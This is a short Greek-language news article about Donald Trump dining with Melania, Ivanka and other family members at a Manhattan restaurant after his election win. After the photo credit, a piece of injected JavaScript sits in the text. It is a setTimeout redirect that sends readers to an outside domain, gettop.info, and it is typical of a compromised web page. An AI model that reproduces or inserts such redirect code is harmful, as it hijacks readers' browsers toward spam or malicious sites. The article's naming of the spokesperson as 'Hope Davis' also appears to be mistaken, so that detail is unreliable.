Η πρώτη έξοδος του Τραμπ-Γιόρτασε με τη Μελάνια και τα παιδιά του τη νίκη του BINTEO

0
14

Σε τραπέζι στο κέντρο του αγαπημένου του εστιατορίου στο Μανχάταν κάθισε ο νέος Πρόεδρος των ΗΠΑ Ντόναλντ Τραμπ, στην πρώτη του έξοδο μετά την εκλογική του νίκη.
Μάλιστα απόλαυσε το αγαπημένο του ποτό ένα virgin Bloody Mary.

Η εκπρόσωπος Τύπου του Hope Davis, είπε πως ούτε η ίδια δεν είχε ενημερωθεί γι’ αυτή την έξοδο και πως έκλεισε η λεωφόρος μέχρι να ολοκληρώσει το δείπνο του ο Ντόναλντ Τραμπ, ο οποίος δεν συνηθίζει να βγαίνει έξω, αλλά προτιμάει να κάθεται στον γυάλινο πύργο του.Μάλιστα μέσα στο εστιατόριο επετράπη η είσοδος σε μερικούς δημοσιογράφους, οι oποίοι όμως δεν αποκάλυψαν τι περιελάμβανε το δείπνο της οικογένειας.
Ο Ντόναλντ Τραμπ απόλαυσε την παρέα της συζύγου του Μελάνιας, των παιδιών του μεταξύ των οποίων και της Ιβάνκα και του συζύγου της.

Επιπλέον σύμφωνα με τη Daily Mail, ο Τραμπ αφού χαιρέτησε τους υπαλλήλους φέρεται να είπε στον ιδιοκτήτη του εστιατορίου «μην ανησυχείτε, εμείς θα μειώσουμε τους φόρους».

*Η φωτογραφία είναι από τον λογαριασμό Twitter της δημοσιογράφου του Bloomberg, @RiggsReport setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here